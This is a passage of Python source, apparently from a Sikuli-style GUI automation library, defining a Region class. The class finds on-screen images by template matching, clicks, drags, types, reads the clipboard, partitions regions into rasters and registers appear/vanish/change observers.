x = self.getX() - l
y = self.getY() - t
w = self.getW() + l + r
h = self.getH() + t + b
self.setRect(x, y, w, h)
return self
def getBitmap(self):
""" Captures screen area of this region, at least the part that is on the screen
Returns image as numpy array
"""
return PlatformManager.getBitmapFromRect(self.x, self.y, self.w, self.h)
def debugPreview(self, title="Debug"):
""" Displays the region in a preview window.
If the region is a Match, circles the target area. If the region is larger than half the
primary screen in either dimension, scales it down to half size.
"""
region = self
haystack = self.getBitmap()
if isinstance(region, Match):
cv2.circle(
haystack,
(region.getTarget().x - self.x, region.getTarget().y - self.y),
5,
255)
if haystack.shape[0] > (Screen(0).getBounds()[2]/2) or haystack.shape[1] > (Screen(0).getBounds()[3]/2):
# Image is bigger than half the screen; scale it down
haystack = cv2.resize(haystack, (0, 0), fx=0.5, fy=0.5)
Image.fromarray(haystack).show()
def highlight(self, *args):
""" Highlights the region with a colored frame. Accepts the following parameters:
highlight([toEnable], [seconds], [color])
* toEnable (boolean): Enables or disables the overlay
* seconds (number): Seconds to show overlay
* color (string): Hex code ("#XXXXXX") or color name ("black")
"""
toEnable = (self._highlighter is None)
seconds = 3
color = "red"
if len(args) > 3:
raise TypeError("Unrecognized argument(s) for highlight()")
for arg in args:
if type(arg) == bool:
toEnable = arg
elif isinstance(arg, Number):
seconds = arg
elif isinstance(arg, basestring):
color = arg
if self._highlighter is not None:
self._highlighter.close()
if toEnable:
self._highlighter = PlatformManager.highlight((self.getX(), self.getY(), self.getW(), self.getH()), color, seconds)
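# Hedged example for highlight(): Region(0, 0, 200, 100).highlight(2, "blue")
# draws a blue frame for two seconds; highlight(True) turns a persistent
# overlay on and highlight(False) removes it (argument order is flexible, as
# parsed above).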
def find(self, pattern):
""" Searches for an image pattern in the given region
Throws ``FindFailed`` exception if the image could not be found.
Sikuli supports OCR search with a text parameter. This does not (yet).
"""
findFailedRetry = True
while findFailedRetry:
match = self.exists(pattern)
if match is not None:
break
path = pattern.path if isinstance(pattern, Pattern) else pattern
findFailedRetry = self._raiseFindFailed("Could not find pattern '{}'".format(path))
if findFailedRetry:
time.sleep(self._repeatWaitTime)
return match
def findAll(self, pattern):
""" Searches for an image pattern in the given region
Returns an iterator of ``Match`` objects if ``pattern`` exists, an empty iterator otherwise (does not
throw an exception). Sikuli supports OCR search with a text parameter. This does not (yet).
"""
find_time = time.time()
r = self.clipRegionToScreen()
if r is None:
raise ValueError("Region outside all visible screens")
seconds = self.autoWaitTimeout
if not isinstance(pattern, Pattern):
if not isinstance(pattern, basestring):
raise TypeError("find expected a string [image path] or Pattern object")
pattern = Pattern(pattern)
needle = cv2.imread(pattern.path)
if needle is None:
raise ValueError("Unable to load image '{}'".format(pattern.path))
needle_height, needle_width, needle_channels = needle.shape
positions = []
timeout = time.time() + seconds
# Check TemplateMatcher for valid matches
matches = []
while time.time() < timeout and len(matches) == 0:
matcher = TemplateMatcher(r.getBitmap())
matches = matcher.findAllMatches(needle, pattern.similarity)
time.sleep(1/self._defaultScanRate if self._defaultScanRate is not None else 1/Settings.WaitScanRate)
if len(matches) == 0:
Debug.info("Couldn't find '{}' with enough similarity.".format(pattern.path))
return iter([])
# Matches found! Turn them into Match objects
lastMatches = []
for match in matches:
position, confidence = match
x, y = position
lastMatches.append(
Match(
confidence,
pattern.offset,
((x+self.x, y+self.y), (needle_width, needle_height))))
self._lastMatches = iter(lastMatches)
Debug.info("Found match(es) for pattern '{}' at similarity ({})".format(pattern.path, pattern.similarity))
self._lastMatchTime = (time.time() - find_time) * 1000 # Capture find time in milliseconds
return self._lastMatches
def wait(self, pattern, seconds=None):
""" Searches for an image pattern in the given region, given a specified timeout period
Functionally identical to find(). If a number is passed instead of a pattern,
just waits the specified number of seconds.
Sikuli supports OCR search with a text parameter. This does not (yet).
"""
if isinstance(pattern, (int, float)):
if pattern == FOREVER:
while True:
time.sleep(1) # Infinite loop
time.sleep(pattern)
return None
if seconds is None:
seconds = self.autoWaitTimeout
findFailedRetry = True
timeout = time.time() + seconds
while findFailedRetry:
while True:
match = self.exists(pattern)
if match:
return match
if time.time() >= timeout:
break
path = pattern.path if isinstance(pattern, Pattern) else pattern
findFailedRetry = self._raiseFindFailed("Could not find pattern '{}'".format(path))
if findFailedRetry:
time.sleep(self._repeatWaitTime)
return None
def waitVanish(self, pattern, seconds=None):
""" Waits until the specified pattern is not visible on screen.
If ``seconds`` pass and the pattern is still visible, raises FindFailed exception.
Sikuli supports OCR search with a text parameter. This does not (yet).
"""
r = self.clipRegionToScreen()
if r is None:
raise ValueError("Region outside all visible screens")
if seconds is None:
seconds = self.autoWaitTimeout
if not isinstance(pattern, Pattern):
if not isinstance(pattern, basestring):
raise TypeError("find expected a string [image path] or Pattern object")
pattern = Pattern(pattern)
needle = cv2.imread(pattern.path)
match = True
timeout = time.time() + seconds
while match and time.time() < timeout:
matcher = TemplateMatcher(r.getBitmap())
# When needle disappears, matcher returns None
match = matcher.findBestMatch(needle, pattern.similarity)
time.sleep(1/self._defaultScanRate if self._defaultScanRate is not None else 1/Settings.WaitScanRate)
if match:
return False
#self._findFailedHandler(FindFailed("Pattern '{}' did not vanish".format(pattern.path)))
def exists(self, pattern, seconds=None):
""" Searches for an image pattern in the given region
Returns Match if pattern exists, None otherwise (does not throw exception)
Sikuli supports OCR search with a text parameter. This does not (yet).
"""
find_time = time.time()
r = self.clipRegionToScreen()
if r is None:
raise ValueError("Region outside all visible screens")
if seconds is None:
seconds = self.autoWaitTimeout
if isinstance(pattern, int):
# Actually just a "wait" statement
time.sleep(pattern)
return
if not pattern:
time.sleep(seconds)
if not isinstance(pattern, Pattern):
if not isinstance(pattern, basestring):
raise TypeError("find expected a string [image path] or Pattern object")
pattern = Pattern(pattern)
needle = cv2.imread(pattern.path)
if needle is None:
raise ValueError("Unable to load image '{}'".format(pattern.path))
needle_height, needle_width, needle_channels = needle.shape
match = None
timeout = time.time() + seconds
# Consult TemplateMatcher to find needle
while not match:
matcher = TemplateMatcher(r.getBitmap())
match = matcher.findBestMatch(needle, pattern.similarity)
time.sleep(1/self._defaultScanRate if self._defaultScanRate is not None else 1/Settings.WaitScanRate)
if time.time() > timeout:
break
if match is None:
Debug.info("Couldn't find '{}' with enough similarity.".format(pattern.path))
return None
# Translate local position into global screen position
position, confidence = match
position = (position[0] + self.x, position[1] + self.y)
self._lastMatch = Match(
confidence,
pattern.offset,
(position, (needle_width, needle_height)))
#self._lastMatch.debug_preview()
Debug.info("Found match for pattern '{}' at ({},{}) with confidence ({}). Target at ({},{})".format(
pattern.path,
self._lastMatch.getX(),
self._lastMatch.getY(),
self._lastMatch.getScore(),
self._lastMatch.getTarget().x,
self._lastMatch.getTarget().y))
self._lastMatchTime = (time.time() - find_time) * 1000 # Capture find time in milliseconds
return self._lastMatch
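# Hedged example contrasting exists() and find() (the image name is illustrative):
#   m = some_region.exists("save_icon.png", 3)   # returns None if not found within 3 s
#   if m is None:
#       m = some_region.find("save_icon.png")    # raises FindFailed instead (with the default ABORT response)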
def click(self, target=None, modifiers=""):
""" Moves the cursor to the target location and clicks the default mouse button. """
if target is None:
target = self._lastMatch or self # Whichever one is not None
target_location = None
if isinstance(target, Pattern):
target_location = self.find(target).getTarget()
elif isinstance(target, basestring):
target_location = self.find(target).getTarget()
elif isinstance(target, Match):
target_location = target.getTarget()
elif isinstance(target, Region):
target_location = target.getCenter()
elif isinstance(target, Location):
target_location = target
else:
raise TypeError("click expected Pattern, String, Match, Region, or Location object")
if modifiers != "":
keyboard.keyDown(modifiers)
Mouse.moveSpeed(target_location, Settings.MoveMouseDelay)
time.sleep(0.1) # For responsiveness
if Settings.ClickDelay > 0:
time.sleep(min(1.0, Settings.ClickDelay))
Settings.ClickDelay = 0.0
Mouse.click()
time.sleep(0.1)
if modifiers != "":
keyboard.keyUp(modifiers)
Debug.history("Clicked at {}".format(target_location))
def doubleClick(self, target=None, modifiers=""):
""" Moves the cursor to the target location and double-clicks the default mouse button. """
if target is None:
target = self._lastMatch or self # Whichever one is not None
target_location = None
if isinstance(target, Pattern):
target_location = self.find(target).getTarget()
elif isinstance(target, basestring):
target_location = self.find(target).getTarget()
elif isinstance(target, Match):
target_location = target.getTarget()
elif isinstance(target, Region):
target_location = target.getCenter()
elif isinstance(target, Location):
target_location = target
else:
raise TypeError("doubleClick expected Pattern, String, Match, Region, or Location object")
if modifiers != "":
keyboard.keyDown(modifiers)
Mouse.moveSpeed(target_location, Settings.MoveMouseDelay)
time.sleep(0.1)
if Settings.ClickDelay > 0:
time.sleep(min(1.0, Settings.ClickDelay))
Settings.ClickDelay = 0.0
Mouse.click()
time.sleep(0.1)
if Settings.ClickDelay > 0:
time.sleep(min(1.0, Settings.ClickDelay))
Settings.ClickDelay = 0.0
Mouse.click()
time.sleep(0.1)
if modifiers != "":
keyboard.keyUp(modifiers)
def rightClick(self, target=None, modifiers=""):
""" Moves the cursor to the target location and clicks the right mouse button. """
if target is None:
target = self._lastMatch or self # Whichever one is not None
target_location = None
if isinstance(target, Pattern):
target_location = self.find(target).getTarget()
elif isinstance(target, basestring):
target_location = self.find(target).getTarget()
elif isinstance(target, Match):
target_location = target.getTarget()
elif isinstance(target, Region):
target_location = target.getCenter()
elif isinstance(target, Location):
target_location = target
else:
raise TypeError("rightClick expected Pattern, String, Match, Region, or Location object")
if modifiers != "":
keyboard.keyDown(modifiers)
Mouse.moveSpeed(target_location, Settings.MoveMouseDelay)
time.sleep(0.1)
if Settings.ClickDelay > 0:
time.sleep(min(1.0, Settings.ClickDelay))
Settings.ClickDelay = 0.0
Mouse.click(button=Mouse.RIGHT)
time.sleep(0.1)
if modifiers != "":
keyboard.keyUp(modifiers)
def hover(self, target=None):
""" Moves the cursor to the target location """
if target is None:
target = self._lastMatch or self # Whichever one is not None
target_location = None
if isinstance(target, Pattern):
target_location = self.find(target).getTarget()
elif isinstance(target, basestring):
target_location = self.find(target).getTarget()
elif isinstance(target, Match):
target_location = target.getTarget()
elif isinstance(target, Region):
target_location = target.getCenter()
elif isinstance(target, Location):
target_location = target
else:
raise TypeError("hover expected Pattern, String, Match, Region, or Location object")
Mouse.moveSpeed(target_location, Settings.MoveMouseDelay)
def drag(self, dragFrom=None):
""" Starts a dragDrop operation.
Moves the cursor to the target location and clicks the mouse in preparation to drag
a screen element """
if dragFrom is None:
dragFrom = self._lastMatch or self # Whichever one is not None
dragFromLocation = None
if isinstance(dragFrom, Pattern):
dragFromLocation = self.find(dragFrom).getTarget()
elif isinstance(dragFrom, basestring):
dragFromLocation = self.find(dragFrom).getTarget()
elif isinstance(dragFrom, Match):
dragFromLocation = dragFrom.getTarget()
elif isinstance(dragFrom, Region):
dragFromLocation = dragFrom.getCenter()
elif isinstance(dragFrom, Location):
dragFromLocation = dragFrom
else:
raise TypeError("drag expected dragFrom to be Pattern, String, Match, Region, or Location object")
Mouse.moveSpeed(dragFromLocation, Settings.MoveMouseDelay)
time.sleep(Settings.DelayBeforeMouseDown)
Mouse.buttonDown()
Debug.history("Began drag at {}".format(dragFromLocation))
def dropAt(self, dragTo=None, delay=None):
""" Completes a dragDrop operation
Moves the cursor to the target location, waits ``delay`` seconds, and releases the mouse
button """
if dragTo is None:
dragTo = self._lastMatch or self # Whichever one is not None
if isinstance(dragTo, Pattern):
dragToLocation = self.find(dragTo).getTarget()
elif isinstance(dragTo, basestring):
dragToLocation = self.find(dragTo).getTarget()
elif isinstance(dragTo, Match):
dragToLocation = dragTo.getTarget()
elif isinstance(dragTo, Region):
dragToLocation = dragTo.getCenter()
elif isinstance(dragTo, Location):
dragToLocation = dragTo
else:
raise TypeError("dragDrop expected dragTo to be Pattern, String, Match, Region, or Location object")
Mouse.moveSpeed(dragToLocation, Settings.MoveMouseDelay)
time.sleep(delay if delay is not None else Settings.DelayBeforeDrop)
Mouse.buttonUp()
Debug.history("Ended drag at {}".format(dragToLocation))
def dragDrop(self, target, target2=None, modifiers=""):
""" Performs a dragDrop operation.
Holds down the mouse button on ``dragFrom``, moves the mouse to ``dragTo``, and releases
the mouse button.
``modifiers`` may be a typeKeys() compatible string. The specified keys will be held
during the drag-drop operation.
"""
if modifiers != "":
keyboard.keyDown(modifiers)
if target2 is None:
dragFrom = self._lastMatch
dragTo = target
else:
dragFrom = target
dragTo = target2
self.drag(dragFrom)
time.sleep(Settings.DelayBeforeDrag)
self.dropAt(dragTo)
if modifiers != "":
keyboard.keyUp(modifiers)
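# Hedged example for dragDrop (image names are illustrative):
#   region.dragDrop("file_icon.png", "trash_icon.png")   # press on the first match, release on the second
#   # an optional third argument holds modifier keys (same key syntax as type()) during the drag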
def type(self, *args):
""" Usage: type([PSMRL], text, [modifiers])
If a pattern is specified, the pattern is clicked first. Doesn't support text paths.
Special keys can be entered with the key name between brackets, as `"{SPACE}"`, or as
`Key.SPACE`.
"""
pattern = None
text = None
modifiers = None
if len(args) == 1 and isinstance(args[0], basestring):
# Is a string (or Key) to type
text = args[0]
elif len(args) == 2:
if not isinstance(args[0], basestring) and isinstance(args[1], basestring):
pattern = args[0]
text = args[1]
else:
text = args[0]
modifiers = args[1]
elif len(args) == 3 and not isinstance(args[0], basestring):
pattern = args[0]
text = args[1]
modifiers = args[2]
else:
raise TypeError("type method expected ([PSMRL], text, [modifiers])")
if pattern:
self.click(pattern)
Debug.history("Typing '{}' with modifiers '{}'".format(text, modifiers))
kb = keyboard
if modifiers:
kb.keyDown(modifiers)
if Settings.TypeDelay > 0:
typeSpeed = min(1.0, Settings.TypeDelay)
Settings.TypeDelay = 0.0
else:
typeSpeed = self._defaultTypeSpeed
kb.type(text, typeSpeed)
if modifiers:
kb.keyUp(modifiers)
time.sleep(0.2)
def paste(self, *args):
""" Usage: paste([PSMRL], text)
If a pattern is specified, the pattern is clicked first. Doesn't support text paths.
``text`` is pasted as is using the OS paste shortcut (Ctrl+V for Windows/Linux, Cmd+V
for OS X). Note that `paste()` does NOT use special formatting like `type()`.
"""
target = None
text = ""
if len(args) == 1 and isinstance(args[0], basestring):
text = args[0]
elif len(args) == 2 and isinstance(args[1], basestring):
self.click(target)
text = args[1]
else:
raise TypeError("paste method expected [PSMRL], text")
pyperclip.copy(text)
# Triggers OS paste for foreground window
PlatformManager.osPaste()
time.sleep(0.2)
def getClipboard(self):
""" Returns the contents of the clipboard
Can be used to pull outside text into the application, if it is first
copied with the OS keyboard shortcut (e.g., "Ctrl+C") """
return pyperclip.paste()
def text(self):
""" OCR method. Todo. """
raise NotImplementedError("OCR not yet supported")
def mouseDown(self, button):
""" Low-level mouse actions. """
return PlatformManager.mouseButtonDown(button)
def mouseUp(self, button=Mouse.LEFT):
""" Low-level mouse actions """
return Mouse.buttonUp(button)
def mouseMove(self, PSRML=None, dy=0):
""" Low-level mouse actions """
if PSRML is None:
PSRML = self._lastMatch or self # Whichever one is not None
if isinstance(PSRML, Pattern):
move_location = self.find(PSRML).getTarget()
elif isinstance(PSRML, basestring):
move_location = self.find(PSRML).getTarget()
elif isinstance(PSRML, Match):
move_location = PSRML.getTarget()
elif isinstance(PSRML, Region):
move_location = PSRML.getCenter()
elif isinstance(PSRML, Location):
move_location = PSRML
elif isinstance(PSRML, int):
# Assume called as mouseMove(dx, dy)
offset = Location(PSRML, dy)
move_location = Mouse.getPos().offset(offset)
else:
raise TypeError("doubleClick expected Pattern, String, Match, Region, or Location object")
Mouse.moveSpeed(move_location)
def wheel(self, *args): # [PSRML], direction, steps
""" Clicks the wheel the specified number of ticks. Use the following parameters:
wheel([PSRML], direction, steps, [stepDelay])
"""
if len(args) == 2:
PSRML = None
direction = int(args[0])
steps = int(args[1])
stepDelay = None
elif len(args) == 3:
PSRML = args[0]
direction = int(args[1])
steps = int(args[2])
stepDelay = None
elif len(args) == 4:
PSRML = args[0]
direction = int(args[1])
steps = int(args[2])
stepDelay = int(args[3])
else:
raise TypeError("wheel expected ([PSRML], direction, steps, [stepDelay])")
if PSRML is not None:
self.mouseMove(PSRML)
Mouse.wheel(direction, steps)
def atMouse(self):
return Mouse.at()
def keyDown(self, keys):
""" Concatenate multiple keys to press them all down. """
return keyboard.keyDown(keys)
def keyUp(self, keys):
""" Concatenate multiple keys to up them all. """
return keyboard.keyUp(keys)
def write(self, text):
""" Has fancy special options. Not implemented yet. """
raise NotImplementedError()
def delayType(self, millisecs):
Settings.TypeDelay = millisecs
def isRegionValid(self):
""" Returns false if the whole region is not even partially inside any screen, otherwise true """
screens = PlatformManager.getScreenDetails()
for screen in screens:
s_x, s_y, s_w, s_h = screen["rect"]
if self.x+self.w >= s_x and s_x+s_w >= self.x and self.y+self.h >= s_y and s_y+s_h >= self.y:
# Rects overlap
return True
return False
def clipRegionToScreen(self):
""" Returns the part of the region that is visible on a screen
If the region equals all visible screens, returns Screen(-1).
If the region is visible on multiple screens, returns the screen with the smallest ID.
Returns None if the region is outside the screen.
"""
if not self.isRegionValid():
return None
screens = PlatformManager.getScreenDetails()
total_x, total_y, total_w, total_h = Screen(-1).getBounds()
containing_screen = None
for screen in screens:
s_x, s_y, s_w, s_h = screen["rect"]
if self.x >= s_x and self.x+self.w <= s_x+s_w and self.y >= s_y and self.y+self.h <= s_y+s_h:
# Region completely inside screen
return self
elif self.x+self.w <= s_x or s_x+s_w <= self.x or self.y+self.h <= s_y or s_y+s_h <= self.y:
# Region completely outside screen
continue
elif self.x == total_x and self.y == total_y and self.w == total_w and self.h == total_h:
# Region equals all screens, Screen(-1)
return self
else:
# Region partially inside screen
x = max(self.x, s_x)
y = max(self.y, s_y)
w = min(self.x+self.w, s_x+s_w) - x
h = min(self.y+self.h, s_y+s_h) - y
return Region(x, y, w, h)
return None
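# Worked example (assumes a single hypothetical 1920x1080 screen):
#   Region(1800, 1000, 200, 200).clipRegionToScreen()
# returns Region(1800, 1000, 120, 80), i.e. only the portion that is actually visible.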
# Partitioning constants
NORTH = 202 # Upper half
NORTH_WEST = 300 # Left third in upper third
NORTH_MID = 301 # Middle third in upper third
NORTH_EAST = 302 # Right third in upper third
SOUTH = 212 # Lower half
SOUTH_WEST = 320 # Left third in lower third
SOUTH_MID = 321 # Middle third in lower third
SOUTH_EAST = 322 # Right third in lower third
EAST = 220 # Right half
EAST_MID = 310 # Middle third in right third
WEST = 221 # Left half
WEST_MID = 312 # Middle third in left third
MID_THIRD = 311 # Middle third in middle third
TT = 200 # Top left quarter
RR = 201 # Top right quarter
BB = 211 # Bottom right quarter
LL = 210 # Bottom left quarter
MID_VERTICAL = "MID_VERT" # Half of width vertically centered
MID_HORIZONTAL = "MID_HORZ" # Half of height horizontally centered
MID_BIG = "MID_HALF" # Half of width/half of height centered
def setRaster(self, rows, columns):
""" Sets the raster for the region, allowing sections to be indexed by row/column """
rows = int(rows)
columns = int(columns)
if rows <= 0 or columns <= 0:
return self
self._raster = [rows, columns]
return self.getCell(0, 0)
def getRow(self, row, numberRows=None):
""" Returns the specified row of the region (if the raster is set)
If numberRows is provided, uses that instead of the raster
"""
row = int(row)
if self._raster[0] == 0 or self._raster[1] == 0:
return self
if numberRows is None or numberRows < 1 or numberRows > 9:
numberRows = self._raster[0]
rowHeight = self.h / numberRows
if row < 0:
# If row is negative, count backwards from the end
row = numberRows + row
if row < 0:
# Bad row index, return last row
return Region(self.x, self.y+self.h-rowHeight, self.w, rowHeight)
elif row > numberRows:
# Bad row index, return first row
return Region(self.x, self.y, self.w, rowHeight)
return Region(self.x, self.y + (row * rowHeight), self.w, rowHeight)
def getCol(self, column, numberColumns=None):
""" Returns the specified column of the region (if the raster is set)
If numberColumns is provided, uses that instead of the raster
"""
column = int(column)
if self._raster[0] == 0 or self._raster[1] == 0:
return self
if numberColumns is None or numberColumns < 1 or numberColumns > 9:
numberColumns = self._raster[1]
columnWidth = self.w / numberColumns
if column < 0:
# If column is negative, count backwards from the end
column = numberColumns + column
if column < 0:
# Bad column index, return last column
return Region(self.x+self.w-columnWidth, self.y, columnWidth, self.h)
elif column > numberColumns:
# Bad column index, return first column
return Region(self.x, self.y, columnWidth, self.h)
return Region(self.x + (column * columnWidth), self.y, columnWidth, self.h)
def getCell(self, row, column):
""" Returns the specified cell (if a raster is set for the region) """
row = int(row)
column = int(column)
if self._raster[0] == 0 or self._raster[1] == 0:
return self
rowHeight = self.h / self._raster[0]
columnWidth = self.w / self._raster[1]
if column < 0:
# If column is negative, count backwards from the end
column = self._raster[1] + column
if column < 0:
# Bad column index, return last column
column = self._raster[1] - 1
elif column > self._raster[1]:
# Bad column index, return first column
column = 0
if row < 0:
# If row is negative, count backwards from the end
row = self._raster[0] + row
if row < 0:
# Bad row index, return last row
row = self._raster[0] - 1
elif row > self._raster[0]:
# Bad row index, return first row
row = 0
return Region(self.x+(column*columnWidth), self.y+(row*rowHeight), columnWidth, rowHeight)
def get(self, part):
""" Returns a section of the region as a new region
Accepts partitioning constants, e.g. Region.NORTH, Region.NORTH_WEST, etc.
Also accepts an int 200-999:
* First digit: Raster (*n* rows by *n* columns)
* Second digit: Row index (if equal to raster, gets the whole row)
* Third digit: Column index (if equal to raster, gets the whole column)
Region.get(522) will use a raster of 5 rows and 5 columns and return
the cell in the middle.
Region.get(525) will use a raster of 5 rows and 5 columns and return the row in the middle.
"""
if part == self.MID_VERTICAL:
return Region(self.x+(self.w/4), self.y, self.w/2, self.h)
elif part == self.MID_HORIZONTAL:
return Region(self.x, self.y+(self.h/4), self.w, self.h/2)
elif part == self.MID_BIG:
return Region(self.x+(self.w/4), self.y+(self.h/4), self.w/2, self.h/2)
elif isinstance(part, int) and part >= 200 and part <= 999:
raster, row, column = str(part)
self.setRaster(raster, raster)
if row == raster and column == raster:
return self
elif row == raster:
return self.getCol(column)
elif column == raster:
return self.getRow(row)
else:
return self.getCell(row,column)
else:
return self
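# Illustration (hypothetical 600x600 region):
#   reg.get(Region.NORTH)  -> upper half, 600x300
#   reg.get(522)           -> 5x5 raster, the middle cell, 120x120
#   reg.get(525)           -> 5x5 raster, the middle row, 600x120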
def setRows(self, rows):
""" Sets the number of rows in the raster (if columns have not been initialized, set to 1 as well) """
self._raster[0] = rows
if self._raster[1] == 0:
self._raster[1] = 1
def setCols(self, columns):
""" Sets the number of columns in the raster (if rows have not been initialized, set to 1 as well) """
self._raster[1] = columns
if self._raster[0] == 0:
self._raster[0] = 1
def isRasterValid(self):
return self.getCols() > 0 and self.getRows() > 0
def getRows(self):
return self._raster[0]
def getCols(self):
return self._raster[1]
def getRowH(self):
if self._raster[0] == 0:
return 0
return self.h / self._raster[0]
def getColW(self):
if self._raster[1] == 0:
return 0
return self.w / self._raster[1]
def showScreens(self):
""" Synonym for showMonitors """
Screen.showMonitors()
def resetScreens(self):
""" Synonym for resetMonitors """
Screen.resetMonitors()
def getTarget(self):
""" By default, a region's target is its center """
return self.getCenter()
def setCenter(self, loc):
""" Move this region so it is centered on ``loc`` """
offset = self.getCenter().getOffset(loc) # Calculate offset from current center
return self.setLocation(self.getTopLeft().offset(offset)) # Move top left corner by the same offset
def setTopLeft(self, loc):
""" Move this region so its top left corner is on ``loc`` """
return self.setLocation(loc)
def setTopRight(self, loc):
""" Move this region so its top right corner is on ``loc`` """
offset = self.getTopRight().getOffset(loc) # Calculate offset from current top right
return self.setLocation(self.getTopLeft().offset(offset)) # Move top left corner by the same offset
def setBottomLeft(self, loc):
""" Move this region so its bottom left corner is on ``loc`` """
offset = self.getBottomLeft().getOffset(loc) # Calculate offset from current bottom left
return self.setLocation(self.getTopLeft().offset(offset)) # Move top left corner by the same offset
def setBottomRight(self, loc):
""" Move this region so its bottom right corner is on ``loc`` """
offset = self.getBottomRight().getOffset(loc) # Calculate offset from current bottom right
return self.setLocation(self.getTopLeft().offset(offset)) # Move top left corner by the same offset
def setSize(self, w, h):
""" Sets the new size of the region """
self.setW(w)
self.setH(h)
return self
def setRect(self, *args):
""" Sets the rect of the region. Accepts the following arguments:
setRect(rect_tuple)
setRect(x, y, w, h)
setRect(rect_region)
"""
if len(args) == 1:
if isinstance(args[0], tuple):
x, y, w, h = args[0]
elif isinstance(args[0], Region):
x = args[0].getX()
y = args[0].getY()
w = args[0].getW()
h = args[0].getH()
else:
raise TypeError("Unrecognized arguments for setRect")
elif len(args) == 4:
x, y, w, h = args
else:
raise TypeError("Unrecognized arguments for setRect")
self.setX(x)
self.setY(y)
self.setW(w)
self.setH(h)
return self
def saveScreenCapture(self, path=None, name=None):
""" Saves the region's bitmap """
bitmap = self.getBitmap()
target_file = None
if path is None and name is None:
_, target_file = tempfile.mkstemp(".png")
elif name is None:
_, tfile = tempfile.mkstemp(suffix=".png", dir=path)
target_file = tfile
else:
target_file = os.path.join(path, name+".png")
cv2.imwrite(target_file, bitmap)
return target_file
def getLastScreenImage(self):
""" Gets the last image taken on this region's screen """
return self.getScreen().getLastScreenImageFromScreen()
def saveLastScreenImage(self):
""" Saves the last image taken on this region's screen to a temporary file """
bitmap = self.getLastScreenImage()
_, target_file = tempfile.mkstemp(".png")
cv2.imwrite(target_file, bitmap)
return target_file
def asOffset(self):
""" Returns bottom right corner as offset from top left corner """
return Location(self.getW(), self.getH())
def rightAt(self, offset=0):
""" Returns point in the center of the region's right side (offset to the right
by ``offset``) """
return Location(self.getX() + self.getW() + offset, self.getY() + (self.getH() / 2))
def leftAt(self, offset=0):
""" Returns point in the center of the region's left side (offset to the left
by negative ``offset``) """
return Location(self.getX() + offset, self.getY() + (self.getH() / 2))
def aboveAt(self, offset=0):
""" Returns point in the center of the region's top side (offset to the top
by negative ``offset``) """
return Location(self.getX() + (self.getW() / 2), self.getY() + offset)
def bottomAt(self, offset=0):
""" Returns point in the center of the region's bottom side (offset to the bottom
by ``offset``) """
return Location(self.getX() + (self.getW() / 2), self.getY() + self.getH() + offset)
def union(self, ur):
""" Returns a new region that contains both this region and the specified region """
x = min(self.getX(), ur.getX())
y = min(self.getY(), ur.getY())
w = max(self.getBottomRight().x, ur.getBottomRight().x) - x
h = max(self.getBottomRight().y, ur.getBottomRight().y) - y
return Region(x, y, w, h)
def intersection(self, ir):
""" Returns a new region that contains the overlapping portion of this region and the specified region (may be None) """
x = max(self.getX(), ir.getX())
y = max(self.getY(), ir.getY())
w = min(self.getBottomRight().x, ir.getBottomRight().x) - x
h = min(self.getBottomRight().y, ir.getBottomRight().y) - y
if w > 0 and h > 0:
return Region(x, y, w, h)
return None
def findAllByRow(self, target):
""" Returns an array of rows in the region (defined by the raster), each
row containing all matches in that row for the target pattern. """
row_matches = []
for row_index in range(self._raster[0]):
row = self.getRow(row_index)
row_matches.append(row.findAll(target))
return row_matches
def findAllByColumn(self, target):
""" Returns an array of columns in the region (defined by the raster), each
column containing all matches in that column for the target pattern. """
column_matches = []
for column_index in range(self._raster[1]):
column = self.getCol(column_index)
column_matches.append(column.findAll(target))
return column_matches
def findBest(self, pattern):
""" Returns the *best* match in the region (instead of the first match) """
findFailedRetry = True
while findFailedRetry:
best_match = None
all_matches = self.findAll(pattern)
for match in all_matches:
if best_match is None or best_match.getScore() < match.getScore():
best_match = match
self._lastMatch = best_match
if best_match is not None:
break
path = pattern.path if isinstance(pattern, Pattern) else pattern
findFailedRetry = self._raiseFindFailed("Could not find pattern '{}'".format(path))
if findFailedRetry:
time.sleep(self._repeatWaitTime)
return best_match
def compare(self, image):
""" Compares the region to the specified image """
return self.exists(Pattern(image), 0)
def findText(self, text, timeout=None):
""" OCR function """
raise NotImplementedError()
def findAllText(self, text):
""" OCR function """
raise NotImplementedError()
# Event Handlers
def onAppear(self, pattern, handler=None):
""" Registers an event to call ``handler`` when ``pattern`` appears in this region.
The ``handler`` function should take one parameter, an ObserveEvent object
(see below). This event is ignored in the future unless the handler calls
the repeat() method on the provided ObserveEvent object.
Returns the event's ID as a string.
"""
return self._observer.register_event("APPEAR", pattern, handler)
def onVanish(self, pattern, handler=None):
""" Registers an event to call ``handler`` when ``pattern`` disappears from this region.
The ``handler`` function should take one parameter, an ObserveEvent object
(see below). This event is ignored in the future unless the handler calls
the repeat() method on the provided ObserveEvent object.
Returns the event's ID as a string.
"""
return self._observer.register_event("VANISH", pattern, handler)
def onChange(self, min_changed_pixels=None, handler=None):
""" Registers an event to call ``handler`` when at least ``min_changed_pixels``
change in this region.
(Default for min_changed_pixels is set in Settings.ObserveMinChangedPixels)
The ``handler`` function should take one parameter, an ObserveEvent object
(see below). This event is ignored in the future unless the handler calls
the repeat() method on the provided ObserveEvent object.
Returns the event's ID as a string.
"""
if isinstance(min_changed_pixels, int) and (callable(handler) or handler is None):
return self._observer.register_event(
"CHANGE",
pattern=(min_changed_pixels, self.getBitmap()),
handler=handler)
elif (callable(min_changed_pixels) or min_changed_pixels is None) and (callable(handler) or handler is None):
handler = min_changed_pixels or handler
return self._observer.register_event(
"CHANGE",
pattern=(Settings.ObserveMinChangedPixels, self.getBitmap()),
handler=handler)
else:
raise ValueError("Unsupported arguments for onChange method")
def isChanged(self, min_changed_pixels, screen_state):
""" Returns true if at least ``min_changed_pixels`` are different between
``screen_state`` and the current state.
"""
r = self.clipRegionToScreen()
current_state = r.getBitmap()
diff = numpy.subtract(current_state, screen_state)
return (numpy.count_nonzero(diff) >= min_changed_pixels)
def observe(self, seconds=None):
""" Begins the observer loop (synchronously).
Loops for ``seconds`` or until this region's stopObserver() method is called.
If ``seconds`` is None, the observer loop cycles until stopped. If this
method is called while the observer loop is already running, it returns False.
Returns True if the observer could be started, False otherwise.
"""
# Check if observer is already running
if self._observer.isRunning:
return False # Could not start
# Set timeout
if seconds is not None:
timeout = time.time() + seconds
else:
timeout = None
# Start observe loop
while (not self._observer.isStopped) and (seconds is None or time.time() < timeout):
# Check registered events
self._observer.check_events()
# Sleep for scan rate
time.sleep(1/self.getObserveScanRate())
return True
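# Usage sketch (hypothetical image path and handler):
#   def on_button(event):
#       event.getRegion().click(event.getPattern())
#   reg.onAppear(Pattern("button.png"), on_button)
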